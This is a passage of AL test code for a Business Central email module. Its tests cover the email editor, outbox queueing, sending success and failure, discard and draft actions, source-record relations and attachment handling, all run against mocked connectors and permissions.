Assert.IsFalse(EmailEditor.Upload.Enabled(), 'Upload Action was not disabled.');
#else
Assert.IsFalse(EmailEditor.Attachments.Upload.Visible(), 'Upload Action is visible.');
#endif
Assert.IsFalse(EmailEditor.Send.Enabled(), 'Send Action was not disabled.');
EmailMessageAttachment.SetRange("Email Message Id", EmailMessage.GetId());
EmailMessageAttachment.FindFirst();
asserterror EmailMessageAttachment.Delete();
Assert.ExpectedError(EmailMessageQueuedCannotDeleteAttachmentErr);
end;
[Test]
[TransactionModel(TransactionModel::AutoRollback)]
procedure OpenMessageInEditorForAQueuedMessageOwnedByAnotherUserTest()
var
TempAccount: Record "Email Account" temporary;
EmailOutBox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailEditor: TestPage "Email Editor";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
EmailOutBox.Init();
EmailOutBox."Account Id" := TempAccount."Account Id";
EmailOutBox.Connector := Enum::"Email Connector"::"Test Email Connector";
EmailOutBox."Message Id" := EmailMessage.GetId();
EmailOutBox.Status := Enum::"Email Status"::Queued;
EmailOutbox."User Security Id" := 'd0a983f4-0fc8-4982-8e02-ee9294ab28da'; // Created by another user
EmailOutBox.Insert();
// Exercise/Verify
EmailEditor.Trap();
asserterror Email.OpenInEditor(EmailMessage);
Assert.ExpectedError(EmailMessageOpenPermissionErr);
end;
[Test]
procedure OpenSentMessageInEditorTest()
var
TempAccount: Record "Email Account" temporary;
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailEditor: TestPage "Email Editor";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
Email.Send(EmailMessage, TempAccount);
// Exercise/Verify
EmailEditor.Trap();
asserterror Email.OpenInEditor(EmailMessage);
Assert.ExpectedError(EmailMessageCannotBeEditedErr);
end;
[Test]
[HandlerFunctions('EmailEditorHandler,OnEmailEditorClose')]
procedure OpenInEditorModallyDiscardAOptionTest()
var
TempAccount: Record "Email Account" temporary;
EmailOutbox: Record "Email Outbox";
SentEmail: Record "Sent Email";
Message: Record "Email Message";
Attachment: Record "Email Message Attachment";
Recipient: Record "Email Recipient";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailAction: Enum "Email Action";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
OptionChoice := 2; // Discard email
EmailAction := Email.OpenInEditorModally(EmailMessage, TempAccount);
// Exercise/Verify
// See EmailEditorHandler
// When the message was discarded, there should be no leftover records
Assert.AreEqual(Enum::"Email Action"::Discarded, EmailAction, 'Wrong email action returned');
Assert.IsFalse(EmailMessage.Get(EmailMessage.GetId()), 'The email message should not exist');
Assert.IsFalse(Message.Get(EmailMessage.GetId()), 'The email message record should not exist');
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(EmailOutbox.IsEmpty(), 'There should be no outbox to the discarded message');
SentEmail.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(SentEmail.IsEmpty(), 'There should be no sent email to the discarded message');
Recipient.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsTrue(Recipient.IsEmpty(), 'There should be no recipient to the discarded message');
Attachment.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsTrue(Attachment.IsEmpty(), 'There should be no attachments to the discarded message');
end;
[Test]
[HandlerFunctions('EmailEditorHandler,OnEmailEditorClose')]
procedure OpenInEditorModallySaveAsDraftOptionTest()
var
TempAccount: Record "Email Account" temporary;
EmailOutbox: Record "Email Outbox";
SentEmail: Record "Sent Email";
Message: Record "Email Message";
Attachment: Record "Email Message Attachment";
Recipient: Record "Email Recipient";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailAction: Enum "Email Action";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
OptionChoice := 1; // Keep as draft
EmailAction := Email.OpenInEditorModally(EmailMessage, TempAccount);
// Exercise/Verify
// See EmailEditorHandler
// Exercise
// When the message was saved as draft (see OnEmailEditorClose)
// Verify
Assert.AreEqual(Enum::"Email Action"::"Saved As Draft", EmailAction, 'Wrong email action returned');
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email message should exist');
Assert.IsTrue(Message.Get(EmailMessage.GetId()), 'The email message record should exist');
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.IsFalse(EmailOutbox.IsEmpty(), 'There should be an outbox to the message');
SentEmail.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(SentEmail.IsEmpty(), 'There should be no sent email to the message');
Recipient.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsFalse(Recipient.IsEmpty(), 'There should be a recipient to the message');
Attachment.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsFalse(Attachment.IsEmpty(), 'There should be an attachment to the discarded message');
end;
[Test]
[HandlerFunctions('SendEmailEditorHandler')]
procedure OpenInEditorModallySendActionTest()
var
TempAccount: Record "Email Account" temporary;
EmailOutbox: Record "Email Outbox";
SentEmail: Record "Sent Email";
Message: Record "Email Message";
Attachment: Record "Email Message Attachment";
Recipient: Record "Email Recipient";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailAction: Enum "Email Action";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
EmailAction := Email.OpenInEditorModally(EmailMessage, TempAccount);
// Exercise
// See SendEmailEditorHandlers
// Verify
Assert.AreEqual(Enum::"Email Action"::Sent, EmailAction, 'Wrong email action returned');
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email message should exist');
Assert.IsTrue(Message.Get(EmailMessage.GetId()), 'The email message record should exist');
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(EmailOutbox.IsEmpty(), 'There should be no outbox to the message');
SentEmail.SetRange("Message Id", EmailMessage.GetId());
Assert.IsFalse(SentEmail.IsEmpty(), 'There should be a sent email to the message');
Recipient.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsFalse(Recipient.IsEmpty(), 'There should be a recipient to the message');
Attachment.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsFalse(Attachment.IsEmpty(), 'There should be an attachment to the discarded message');
end;
[Test]
[HandlerFunctions('DiscardEmailEditorHandler,ConfirmYes')]
procedure OpenInEditorModallyDiscardActionTest()
var
TempAccount: Record "Email Account" temporary;
EmailOutbox: Record "Email Outbox";
SentEmail: Record "Sent Email";
Message: Record "Email Message";
Attachment: Record "Email Message Attachment";
Recipient: Record "Email Recipient";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailAction: Enum "Email Action";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
EmailAction := Email.OpenInEditorModally(EmailMessage, TempAccount);
// Exercise
// See DiscardEmailEditorHandler
// Verify
Assert.AreEqual(Enum::"Email Action"::Discarded, EmailAction, 'Wrong email action returned');
Assert.IsFalse(EmailMessage.Get(EmailMessage.GetId()), 'The email message should not exist');
Assert.IsFalse(Message.Get(EmailMessage.GetId()), 'The email message record should not exist');
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(EmailOutbox.IsEmpty(), 'There should be no outbox to the message');
SentEmail.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(SentEmail.IsEmpty(), 'There should be no sent email to the message');
Recipient.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsTrue(Recipient.IsEmpty(), 'There should be no recipient to the message');
Attachment.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsTrue(Attachment.IsEmpty(), 'There should be no attachment to the discarded message');
end;
[Test]
[Scope('OnPrem')]
[TransactionModel(TransactionModel::AutoRollback)]
procedure EnqueueExistingEmailTest()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
AccountId: Guid;
begin
// [Scenario] When enqueuing an existing email, it appears in the outbox
PermissionsMock.Set('Email Edit');
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(AccountId);
// [When] Enqueuing the email message with the email account
ClearLastError();
Email.Enqueue(EmailMessage, AccountId, Enum::"Email Connector"::"Test Email Connector");
// [Then] No error occurs
Assert.AreEqual('', GetLastErrorText(), 'There should be no errors when enqueuing an email.');
// [Then] The enqueued email should be the correct one
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.AreEqual(1, EmailOutbox.Count(), 'There should be only one enqueued message');
Assert.IsTrue(EmailOutbox.FindFirst(), 'The message should be queued');
Assert.AreEqual(AccountId, EmailOutbox."Account Id", 'The account should be set');
Assert.AreEqual(Enum::"Email Connector"::"Test Email Connector", EmailOutbox.Connector, 'The connector should be set');
Assert.AreEqual(EmailOutbox.Status::Queued, EmailOutbox.Status, 'The status should be ''Queued''');
Assert.AreEqual(UserSecurityId(), EmailOutbox."User Security Id", 'The user security ID should be the current user');
Assert.AreEqual(EmailMessage.GetSubject(), EmailOutbox.Description, 'The description does not match the email title');
Assert.AreEqual('', EmailOutbox."Error Message", 'The error message should be blank');
end;
[Test]
[Scope('OnPrem')]
[TransactionModel(TransactionModel::AutoRollback)]
procedure EnqueueScheduledEmailTest()
var
EmailOutbox: Record "Email Outbox";
ScheduleTasks: Record "Scheduled Task";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
AccountId: Guid;
DateTime: DateTime;
begin
// [Scenario] When enqueuing an existing email, it appears in the outbox
PermissionsMock.Set('Email Edit');
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(AccountId);
// [When] Enqueuing the email message with the email account
ScheduleTasks.DeleteAll();
ClearLastError();
DateTime := CreateDateTime(CalcDate('<+1D>', Today()), Time());
Email.Enqueue(EmailMessage, AccountId, Enum::"Email Connector"::"Test Email Connector", DateTime);
// [Then] No error occurs
Assert.AreEqual('', GetLastErrorText(), 'There should be no errors when enqueuing an email.');
// [Then] Job is enqueued
Assert.AreEqual(ScheduleTasks.Count, 1, 'Enqueue should only add one entry to scheduled tasks');
Assert.IsTrue(ScheduleTasks.FindFirst(), 'The job should be in scheduled tasks');
Assert.AreEqual(Format(ScheduleTasks."Not Before", 0, '<Day,2>-<Month,2>-<Year> <Hours24,2>.<Minutes,2>.<Seconds,2>'), Format(DateTime, 0, '<Day,2>-<Month,2>-<Year> <Hours24,2>.<Minutes,2>.<Seconds,2>'), 'The jobs not before date should be equal to the datetime provided when enqueueing');
// [Then] The enqueued email should be the correct one
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.AreEqual(1, EmailOutbox.Count(), 'There should be only one enqueued message');
Assert.IsTrue(EmailOutbox.FindFirst(), 'The message should be queued');
Assert.AreEqual(AccountId, EmailOutbox."Account Id", 'The account should be set');
Assert.AreEqual(Enum::"Email Connector"::"Test Email Connector", EmailOutbox.Connector, 'The connector should be set');
Assert.AreEqual(EmailOutbox.Status::Queued, EmailOutbox.Status, 'The status should be ''Queued''');
Assert.AreEqual(UserSecurityId(), EmailOutbox."User Security Id", 'The user security ID should be the current user');
Assert.AreEqual(EmailMessage.GetSubject(), EmailOutbox.Description, 'The description does not match the email title');
Assert.AreEqual('', EmailOutbox."Error Message", 'The error message should be blank');
Assert.AreEqual(DateTime, EmailOutbox."Date Sending", 'The date sending does not match the datetime provided when enqueueing');
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailMessageFailTest()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
Connector: Enum "Email Connector";
EmailStatus: Enum "Email Status";
AccountId: Guid;
begin
// [Scenario] When sending an email on the foreground and the process fails, an error is shown
PermissionsMock.Set('Email Edit');
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(AccountId);
// [When] Sending the email fails
ConnectorMock.FailOnSend(true);
Assert.IsFalse(Email.Send(EmailMessage, AccountId, Connector::"Test Email Connector"), 'Sending an email should have failed');
// [Then] The error is as expected
EmailOutbox.SetRange("Account Id", AccountId);
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(EmailOutbox.FindFirst(), 'The email outbox entry should exist');
Assert.AreEqual(Connector::"Test Email Connector".AsInteger(), EmailOutbox.Connector.AsInteger(), 'Wrong connector');
Assert.AreEqual(EmailStatus::Failed.AsInteger(), EmailOutbox.Status.AsInteger(), 'Wrong status');
Assert.AreEqual('Failed to send email', EmailOutbox."Error Message", 'Wrong error message');
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailMessageSuccessTest()
var
EmailOutbox: Record "Email Outbox";
EmailMessageAttachment: Record "Email Message Attachment";
SentEmail: Record "Sent Email";
EmailAccount: Record "Email Account";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
Connector: Enum "Email Connector";
begin
// [Scenario] When successfuly sending an email, a recond is added on the Sent Emails table
PermissionsMock.Set('Email Edit');
// [Given] An email message and an email account
CreateEmail(EmailMessage);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
// [When] The email is Sent
Assert.IsTrue(Email.Send(EmailMessage, EmailAccount), 'Sending an email should have succeeded');
// [Then] There is a Sent Mail recond and no Outbox record
SentEmail.SetRange("Account Id", EmailAccount."Account Id");
SentEmail.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(SentEmail.FindFirst(), 'The email sent record should exist');
Assert.AreEqual(EmailMessage.GetId(), SentEmail."Message Id", 'Wrong email message');
Assert.AreEqual(EmailAccount."Email Address", SentEmail."Sent From", 'Wrong email address (sent from)');
Assert.AreNotEqual(0DT, SentEmail."Date Time Sent", 'The Date Time Sent should be filled');
Assert.AreEqual(EmailAccount."Account Id", SentEmail."Account Id", 'Wrong account');
Assert.AreEqual(Connector::"Test Email Connector".AsInteger(), SentEmail.Connector.AsInteger(), 'Wrong connector');
Assert.AreEqual(EmailMessage.GetSubject(), SentEmail.Description, 'Wrong description');
// There is no related outbox
EmailOutbox.SetRange("Account Id", EmailAccount."Account Id");
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.AreEqual(0, EmailOutbox.Count(), 'Email Outbox was not empty.');
//[Then] The attachments cannot be deleted
EmailMessageAttachment.SetRange("Email Message Id", EmailMessage.GetId());
EmailMessageAttachment.FindFirst();
asserterror EmailMessageAttachment.Delete();
Assert.ExpectedError(EmailMessageSentCannotDeleteAttachmentErr);
end;
[Test]
[Scope('OnPrem')]
procedure ShowSourceRecordInOutbox()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
Any: Codeunit Any;
EmailTest: Codeunit "Email Test";
EmailOutboxPage: Page "Email Outbox";
EmailOutboxTestPage: TestPage "Email Outbox";
TableId: Integer;
SystemId: Guid;
begin
BindSubscription(EmailTest);
PermissionsMock.Set('Email Edit');
// [Scenario] Emails with source document, will see the Source Document button
// [Given] An Email with table id and source system id
TableId := Any.IntegerInRange(1, 10000);
SystemId := Any.GuidValue();
// [When] The email is created and saved as draft
CreateEmailWithSource(EmailMessage, TableId, SystemId);
// [When] The email is created and saved as draft
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [And] The Show Source Document button is visible
EmailOutboxTestPage.Trap();
EmailOutboxPage.SetRecord(EmailOutbox);
EmailOutboxPage.Run();
Assert.IsTrue(EmailOutboxTestPage.ShowSourceRecord.Visible(), 'Show Source Record action should be visible');
// [When] Show Source Document button is clicked
ClearLastError();
EmailOutboxTestPage.ShowSourceRecord.Invoke();
// [Then] No error appears
Assert.AreEqual('', GetLastErrorText, 'An error occured');
end;
[Test]
[Scope('OnPrem')]
[HandlerFunctions('RelationPickerHandler')]
procedure ShowMultipleSourceRecords()
var
EmailOutbox: Record "Email Outbox";
EmailMessageRecord: Record "Email Message";
EmailMessage: Codeunit "Email Message";
EmailTest: Codeunit "Email Test";
EmailOutboxPage: Page "Email Outbox";
EmailOutboxTestPage: TestPage "Email Outbox";
TableId: Integer;
SystemId: Guid;
begin
BindSubscription(EmailTest);
EmailOutbox.DeleteAll();
// [Scenario] Emails with multiple source documents, will see the email relation picker
// [Given] An Email with table id and source system id
// [And] The email is with a source and saved as draft
CreateEmail(EmailMessage);
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [When] An extra relation is added - We use email outbox to have a record that actually exists
EmailMessageRecord.Get(EmailMessage.GetId());
TableId := Database::"Email Outbox";
SystemId := EmailOutbox.SystemId;
Email.AddRelation(EmailMessage, TableId, SystemId, Enum::"Email Relation Type"::"Primary Source", Enum::"Email Relation Origin"::"Compose Context");
Email.AddRelation(EmailMessage, Database::"Email Message", EmailMessageRecord.SystemId, Enum::"Email Relation Type"::"Related Entity", Enum::"Email Relation Origin"::"Compose Context");
// [And] The Show Source Document button is clicked
EmailOutboxTestPage.Trap();
EmailOutboxPage.SetRecord(EmailOutbox);
EmailOutboxPage.Run();
Assert.IsTrue(EmailOutboxTestPage.ShowSourceRecord.Visible(), 'Show Source Record action should be visible');
Assert.IsTrue(EmailOutboxTestPage.ShowSourceRecord.Enabled(), 'Show Source Record action should be enabled');
EmailOutboxTestPage.ShowSourceRecord.Invoke();
// [Then] Email picker modal appears
end;
[Test]
[Scope('OnPrem')]
procedure EmailWithoutSourceInOutbox()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
EmailTest: Codeunit "Email Test";
EmailOutboxPage: Page "Email Outbox";
EmailOutboxTestPage: TestPage "Email Outbox";
begin
BindSubscription(EmailTest);
PermissionsMock.Set('Email Edit');
EmailOutbox.DeleteAll();
// [Scenario] Emails with source document, will see the Source Document button
// [Given] An Email with table id and source system id
// [When] The email is created and saved as draft
CreateEmail(EmailMessage);
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [When] The Email Outbox page is opened.
EmailOutboxTestPage.Trap();
EmailOutboxPage.SetRecord(EmailOutbox);
EmailOutboxPage.Run();
// [Then] The Show Source action is visible and disabled.
Assert.IsTrue(EmailOutboxTestPage.ShowSourceRecord.Visible(), 'Show Source Record action should be visible');
Assert.IsFalse(EmailOutboxTestPage.ShowSourceRecord.Enabled(), 'Show Source Record action should be disabled');
end;
[Test]
[Scope('OnPrem')]
procedure EmailWithSourceNoSubscriber()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
Any: Codeunit Any;
EmailOutboxPage: Page "Email Outbox";
EmailOutboxTestPage: TestPage "Email Outbox";
TableId: Integer;
SystemId: Guid;
begin
// [Scenario] Emails with source document, will see the Source Document button
PermissionsMock.Set('Email Edit');
// [Given] An Email with table id and source system id
TableId := Any.IntegerInRange(1, 10000);
SystemId := Any.GuidValue();
// [When] The email is created and saved as draft
CreateEmailWithSource(EmailMessage, TableId, SystemId);
// [When] The email is created and saved as draft
CreateEmail(EmailMessage);
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [When] The Email Outbox page is opened.
EmailOutboxTestPage.Trap();
EmailOutboxPage.SetRecord(EmailOutbox);
EmailOutboxPage.Run();
// [Then] The Show Source action is visible and disabled.
Assert.IsTrue(EmailOutboxTestPage.ShowSourceRecord.Visible(), 'Show Source Record action should be visible');
Assert.IsFalse(EmailOutboxTestPage.ShowSourceRecord.Enabled(), 'Show Source Record action should be disabled');
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailMessageWithSourceTest()
var
TempSentEmail: Record "Sent Email" temporary;
EmailAccount: Record "Email Account";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
Any: Codeunit Any;
SystemId: Guid;
TableId, NumberOfEmails, i : Integer;
MessageIds: List of [Guid];
begin
// [Scenario] When successfuly sending an email with source, a record is added to the email source document table and sent emails table.
PermissionsMock.Set('Email Edit');
// [Given] An email with source and an email account
TableId := Any.IntegerInRange(1, 10000);
SystemId := Any.GuidValue();
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
NumberOfEmails := Any.IntegerInRange(2, 5);
for i := 1 to NumberOfEmails do begin
CreateEmailWithSource(EmailMessage, TableId, SystemId);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
MessageIds.Add(EmailMessage.GetId());
// [When] The email is Sent
Assert.IsTrue(Email.Send(EmailMessage, EmailAccount), 'Sending an email should have succeeded');
end;
Email.GetSentEmailsForRecord(TableId, SystemId, TempSentEmail);
for i := 1 to NumberOfEmails do begin
TempSentEmail.SetCurrentKey("Message Id");
TempSentEmail.SetRange("Message Id", MessageIds.Get(i));
Assert.AreEqual(1, TempSentEmail.Count(), 'Did not find the email in Sent Emails ');
end;
end;
[Test]
[Scope('OnPrem')]
[HandlerFunctions('RelatedAttachmentsHandler,CloseEmailEditorHandler')]
procedure AttachFromRelatedRecords()
var
EmailMessageAttachments: Record "Email Message Attachment";
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
EmailTest: Codeunit "Email Test";
Email: Codeunit Email;
EmailEditorPage: TestPage "Email Editor";
TableId: Integer;
SystemId: Guid;
SourceText: Text;
begin
BindSubscription(EmailTest);
VariableStorage.Clear();
// [Given] A created email
CreateEmail(EmailMessage);
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [And] A related record to the email (in this case, the email is related to an email in the outbox)
TableId := Database::"Email Outbox";
SystemId := EmailOutbox.SystemId;
Email.AddRelation(EmailMessage, TableId, SystemId, Enum::"Email Relation Type"::"Primary Source", Enum::"Email Relation Origin"::"Compose Context");
SourceText := StrSubstNo('%1: %2', EmailOutbox.TableCaption(), Format(EmailOutbox.Id));
VariableStorage.Enqueue(SourceText);
// [When] Opening the Email Related Attachments page
EmailEditorPage.Trap();
Email.OpenInEditor(EmailMessage);
EmailEditorPage.Attachments.SourceAttachments.Invoke();
// [Then] Attachments added through the 'OnFindRelatedAttachments' event are displayed
// [And] A related attachment is added
// [Then] The related attachment is added as an attachment to the email
EmailMessageAttachments.SetRange("Email Message Id", EmailMessage.GetId());
EmailMessageAttachments.FindSet();
Assert.AreEqual(1, EmailMessageAttachments.Count(), 'Related attachment wasnt attached to the email.');
Assert.AreEqual('Attachment1', EmailMessageAttachments."Attachment Name", 'Wrong attachment was attached to email.');
AssertVariableStorageEmpty();
end;
[Test]
[Scope('OnPrem')]
procedure GetRelatedAttachmentsTest()
var
EmailRelatedAttachment: Record "Email Related Attachment";
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
EmailTest: Codeunit "Email Test";
Email: Codeunit Email;
EmailEditor: Codeunit "Email Editor";
TableId: Integer;
SystemId: Guid;
SourceText: Text;
begin
BindSubscription(EmailTest);
VariableStorage.Clear();
// [Given] A created email
CreateEmail(EmailMessage);
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [And] A related record to the email (in this case, the email is related to an email in the outbox)
TableId := Database::"Email Outbox";
SystemId := EmailOutbox.SystemId;
Email.AddRelation(EmailMessage, TableId, SystemId, Enum::"Email Relation Type"::"Primary Source", Enum::"Email Relation Origin"::"Compose Context");
SourceText := StrSubstNo('%1: %2', EmailOutbox.TableCaption(), Format(EmailOutbox.Id));
VariableStorage.Enqueue(SourceText);
EmailEditor.GetRelatedAttachments(EmailMessage.GetId(), EmailRelatedAttachment);
Assert.AreEqual(1, EmailRelatedAttachment.Count(), 'Wrong number of attachments.');
Assert.AreEqual('Attachment1', EmailRelatedAttachment."Attachment Name", 'Wrong attachmentname');
end;
[Test]
[Scope('OnPrem')]
[HandlerFunctions('RelatedAttachmentsHandler,CloseEmailEditorHandler')]
procedure FailedAttachFromRelatedRecords()
var
EmailMessage: Codeunit "Email Message";
EmailTest: Codeunit "Email Test";
Email: Codeunit Email;
EmailEditorPage: TestPage "Email Editor";
begin
BindSubscription(EmailTest);
// [Given] A created email without source record
CreateEmail(EmailMessage);
// [When] Opening the Email Related Attachments page and getting related attachments
EmailEditorPage.Trap();
Email.OpenInEditor(EmailMessage);
asserterror EmailEditorPage.Attachments.SourceAttachments.Invoke();
// [Then] An error message is displayed
Assert.ExpectedError(NoRelatedAttachmentsErr);
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailInBackgroundSuccessTest()
var
EmailAccount: Record "Email Account";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
TestClientType: Codeunit "Test Client Type Subscriber";
EmailTest: Codeunit "Email Test";
Variable: Variant;
Status: Boolean;
MessageID: Guid;
begin
// [Scenario] When Sending the email in the background an event is fired to nothify for the status of the email
PermissionsMock.Set('Email Edit');
TestClientType.SetClientType(ClientType::Background);
BindSubscription(TestClientType);
BindSubscription(EmailTest);
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
// [When] The email is Sent
Email.Send(EmailMessage, EmailAccount);
// [Then] An event is fired to notify for the status of the email
EmailTest.DequeueVariable(Variable);
MessageID := Variable;
EmailTest.DequeueVariable(Variable);
Status := Variable;
// [Then] The event was fired once
EmailTest.AssertVariableStorageEmpty();
Assert.AreEqual(MessageID, EmailMessage.GetId(), 'A different Email was expected');
Assert.IsTrue(Status, 'The email should have been sent');
UnBindSubscription(EmailTest);
UnBindSubscription(TestClientType);
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailInBackgroundFailTest()
var
EmailAccount: Record "Email Account";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
TestClientType: Codeunit "Test Client Type Subscriber";
EmailTest: Codeunit "Email Test";
Variable: Variant;
Status: Boolean;
MessageID: Guid;
begin
// [Scenario] When Sending the email in the background an event is fired to nothify for the status of the email
PermissionsMock.Set('Email Edit');
TestClientType.SetClientType(ClientType::Background);
BindSubscription(TestClientType);
BindSubscription(EmailTest);
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
ConnectorMock.FailOnSend(true);
// [When] The email is Sent
Email.Send(EmailMessage, EmailAccount);
// [Then] An event is fired to notify for the status of the email
EmailTest.DequeueVariable(Variable);
MessageID := Variable;
EmailTest.DequeueVariable(Variable);
Status := Variable;
// [Then] The event was fired once
EmailTest.AssertVariableStorageEmpty();
Assert.AreEqual(MessageID, EmailMessage.GetId(), 'A different Email was expected');
Assert.IsFalse(Status, 'The email should not have been sent');
UnBindSubscription(EmailTest);
UnBindSubscription(TestClientType);
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailInBackgroundFailSubscriberFailsTest()
var
EmailAccount: Record "Email Account";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
TestClientType: Codeunit "Test Client Type Subscriber";
EmailTest: Codeunit "Email Test";
Variable: Variant;
Status: Boolean;
MessageID: Guid;
begin
// [Scenario] When an error occurs on the subscriber it does not propagate up the stack and the notification is sent only once
PermissionsMock.Set('Email Edit');
TestClientType.SetClientType(ClientType::Background);
BindSubscription(TestClientType);
BindSubscription(EmailTest);
EmailTest.ThrowErrorOnAfterSendEmail();
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
ConnectorMock.FailOnSend(true);
// [When] The email is Sent
Email.Send(EmailMessage, EmailAccount);
// [Then] An event is fired to notify for the status of the email
EmailTest.DequeueVariable(Variable);
MessageID := Variable;
EmailTest.DequeueVariable(Variable);
Status := Variable;
// [Then] The event was fired once
EmailTest.AssertVariableStorageEmpty();
Assert.AreEqual(MessageID, EmailMessage.GetId(), 'A different Email was expected');
Assert.IsFalse(Status, 'The email should not have been sent');
UnBindSubscription(EmailTest);
UnBindSubscription(TestClientType);
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailInBackgroundSuccessSubscriberFailsTest()
var
EmailAccount: Record "Email Account";
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
TestClientType: Codeunit "Test Client Type Subscriber";
EmailTest: Codeunit "Email Test";
Variable: Variant;
Status: Boolean;
MessageID: Guid;
begin
